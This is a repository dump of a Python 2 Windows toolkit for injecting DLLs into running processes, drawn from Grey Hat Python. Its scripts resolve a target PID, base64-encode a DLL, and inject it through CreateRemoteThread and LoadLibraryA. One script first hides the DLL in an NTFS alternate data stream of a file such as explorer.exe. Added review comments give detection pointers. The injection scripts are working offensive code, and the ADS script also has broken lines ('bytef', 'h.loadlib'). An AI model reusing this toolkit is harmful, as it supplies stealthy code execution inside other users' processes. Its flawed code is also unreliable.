├── get_pid.py
├── dll_encoder.py
├── dll_inject.py
├── README.md
└── ads_encoded_dll_inject.py
/get_pid.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Get PID script
# Resolves a process image name (e.g. explorer.exe) to a PID by querying the
# WMI Win32_Process class; used to pick the target for the injector scripts.
from win32com.client import GetObject
import sys
WMI = GetObject('winmgmts:')

print "Tool for finding the PID of a process"
print "Insecurety Research (2013)"

if len(sys.argv) != 2:
    print "Usage: %s processname" %(sys.argv[0])
    print "Eg: %s explorer.exe" %(sys.argv[0])
    sys.exit(0)

proc = sys.argv[1]

# NOTE(review): proc is interpolated into the WQL string unescaped, so a name
# containing a double quote alters the query instead of being matched literally.
p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(proc))
# Only the first match is reported; several processes may share a name, and if
# none matches, p[0] raises an uncaught IndexError. .Value unwraps the WMI
# property object into the plain integer.
pid = p[0].Properties_('ProcessId').Value
print "Process ID of %s is %s" %(proc, pid)
--------------------------------------------------------------------------------
/dll_encoder.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# DLL Encoder - Insecurety Research
# Encodes a DLL as a text file for text_inject.py
# Just does a base64, nothing super exciting...
# NOTE(review): the file tree above lists no text_inject.py; from the listing,
# ads_encoded_dll_inject.py appears to be the consumer of this output
# (it base64-decodes its second argument).
import sys

print "DLL to Text Encoder - Insecurety Research (2013)"
print "Encodes a DLL as a base64 encoded textfile"

if (len(sys.argv) != 3):
    print "Usage: %s " %(sys.argv[0])
    print "Eg: %s C:\\test\messagebox.dll encoded.txt" %(sys.argv[0])
    sys.exit(0)

dll = sys.argv[1]
out = sys.argv[2]

# Both handlers below print the same generic message, discard the exception,
# and exit with status 0, so by exit code a failure is indistinguishable from
# success and the cause is lost.
try:
    print "[+] Reading DLL..."
    f = open(dll, "r")
    raw = f.read()
    f.close()
except Exception:
    print "[-] Something failed... Quitting!"
    sys.exit(0)
try:
    print "[+] Creating encoded outfile..."
    # Python 2 codec-style base64: the output is the plain base64 text that the
    # decoder side reverses with .decode('base64').
    encoded = raw.encode('base64')
    g = open(out, "w")
    g.write(encoded)
    g.close()
except Exception:
    print "[-] Something failed... Quitting!"
    sys.exit(0)
print "[+] Encoded File Saved As: %s" %(out)
--------------------------------------------------------------------------------
/dll_inject.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Win32 DLL injector from Grey Hat Python
# Minor formatting cleanups done...
#
# Review notes (defender view): the call sequence in this script -- OpenProcess
# with PROCESS_ALL_ACCESS on a foreign PID, VirtualAllocEx, WriteProcessMemory
# of a path string, GetProcAddress(LoadLibraryA), CreateRemoteThread -- is the
# textbook LoadLibrary injection pattern and is what process-injection
# detections key on (Sysmon Event ID 8 records CreateRemoteThread into another
# process). Because the DLL is brought in through LoadLibraryA, it is an
# ordinary module load in the target and is visible in that process's module
# list, with the path pointing at the on-disk DLL.
import sys
from ctypes import *

print "DLL Injector implementation in Python"
print "Taken from Grey Hat Python"

if (len(sys.argv) != 3):
    print "Usage: %s " %(sys.argv[0])
    print "Eg: %s 1111 C:\\test\messagebox.dll" %(sys.argv[0])
    sys.exit(0)

PAGE_READWRITE = 0x04
# STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | every process-specific right.
PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF )
# MEM_COMMIT | MEM_RESERVE
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
pid = sys.argv[1]
dll_path = sys.argv[2]

dll_len = len(dll_path)

# Get handle to process being injected...
# OpenProcess returns NULL on failure; with this access mask that is typically
# a process the caller has no rights over (another user's, protected, or
# elevated without SeDebugPrivilege) -- the script only reports and exits.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[!] Couldn't get handle to PID: %s" %(pid)
    print "[!] Are you sure %s is a valid PID?" %(pid)
    sys.exit(0)

# Allocate space for DLL path
arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)

# Write DLL path to allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# Resolve LoadLibraryA Address
# kernel32.dll is mapped at the same base in every process of a session, so
# the local GetProcAddress result is reused as the remote thread start address.
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA")

# Now we createRemoteThread with entrypoint set to LoadLibraryA and pointer to DLL path as param
thread_id = c_ulong(0)

# Return values of VirtualAllocEx / WriteProcessMemory above are not checked;
# only CreateRemoteThread's handle is tested.
if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
    print "[!] Failed to inject DLL, exit..."
    sys.exit(0)

print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
python-dll-injection
====================

Python toolkit for injecting DLL files into running processes on Windows

This toolkit is ever expanding as I bother hacking up extra parts for it.
It was inspired after reading Grey Hat Python as a little bit of bedtime reading
to familiarize myself with using Python on Windows for interacting with processes, etc.

Anyway, here is a breakdown of the components and their usage:

dll_inject.py - Simple enough Python DLL injector. Give it a DLL and a PID to inject into, and it will inject the DLL into the process using the createRemoteThread API.

$ python dll_inject.py

DLL Injector implementation in Python

Taken from Grey Hat Python

Usage: dll_inject.py

Eg: dll_inject.py 1111 C:\test\messagebox.dll




dll_encoder.py - Rather simple tool, takes in a DLL file and outputs it as a base64 encoded text file for use with other tools.

$ python dll_encoder.py

DLL to Text Encoder - Insecurety Research (2013)

Encodes a DLL as a base64 encoded textfile

Usage: dll_encoder.py

Eg: dll_encoder.py C:\test\messagebox.dll encoded.txt



ads_encoded_dll_inject.py - my piece de resistance :) it takes in the encoded DLL file, decodes it, stores the decoded DLL file in ADS, and then injects it into the process of your choice.

$ python ads_encoded_dll_inject.py

Encoded DLL Injector

uses ADS streams for extra 1337'ness

version 0.1.

Usage: ads_encoded_dll_inject.py

Eg: ads_encoded_dll_inject.py 1111 C:\test\encoded.txt C:\Windows\explorer.exe


This project is for informational use only and so I can mess with Windows a little. Will clean up and rewrite the original code borrowed from Grey Hat Python eventually.
--------------------------------------------------------------------------------
/ads_encoded_dll_inject.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Encoded DLL injector
# Injects encoded DLL's into a process
#
# Review notes (defender view): the base64 text produced by dll_encoder.py is
# decoded and written into an NTFS alternate data stream "<victim>:exe.dll"
# (dropname below) attached to an existing file, and that stream path is what
# is handed to LoadLibraryA in the target. Stream contents are not shown by a
# plain `dir` listing (`dir /R` and PowerShell `Get-Item -Stream *` enumerate
# them), and Sysmon Event ID 15 (FileCreateStreamHash) records stream creation.
# The stream is written before the target process is even opened, so the
# decoded DLL remains on disk as an artifact whenever a later step fails.
import sys
from ctypes import *

print "Encoded DLL Injector"
print "uses ADS streams for extra 1337'ness"
print "version 0.1."

if (len(sys.argv) != 4):
    print "Usage: %s " %(sys.argv[0])
    print "Eg: %s 1111 C:\\test\encoded.txt C:\Windows\explorer.exe" %(sys.argv[0])
    sys.exit(0)

pid = sys.argv[1]
encoded = sys.argv[2]
# victim is the host file that receives the alternate data stream; dropname is
# the stream name appended after the colon.
victim = sys.argv[3]
dropname = "exe.dll"

PAGE_READWRITE = 0x04
# STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | every process-specific right.
PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF )
# MEM_COMMIT | MEM_RESERVE
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32

# As in dll_encoder.py, both handlers discard the exception and exit 0.
try:
    print "[+] Decoding the file..."
    f = open(encoded, "r")
    dllenc = f.read()
    f.close()
    dll = dllenc.decode('base64')
except Exception:
    print "[-] Something failed!"
    sys.exit(0)
try:
    print "[+] Injecting to alternate data streams!"
    # "<victim>:<dropname>" -- the NTFS alternate-data-stream path syntax.
    hax = "%s:%s" %(victim, dropname)
    adsw = open(hax, "wb")
    adsw.write(dll)
    adsw.close()
except Exception:
    print "[-] Something has gone terribly wrong!"
    sys.exit(0)

# The injected "DLL path" is the stream path itself.
dll_path = hax
dll_len = len(dll_path)

# Get handle to process being injected...
# OpenProcess returns NULL on failure (typically insufficient rights on the
# target); the script only reports and exits, the stream written above stays.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[!] Couldn't get handle to PID: %s" %(pid)
    print "[!] Are you sure %s is a valid PID?" %(pid)
    sys.exit(0)

# Allocate space for DLL path
arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)

# Write DLL path to allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, bytef(written))

# Resolve LoadLibraryA Address
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h.loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryA")

# Now we createRemoteThread with entrypoint set to LoadLibraryA and pointer to DLL path as param
thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
    print "[!] Failed to inject DLL, exit..."
    sys.exit(0)

print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value)
--------------------------------------------------------------------------------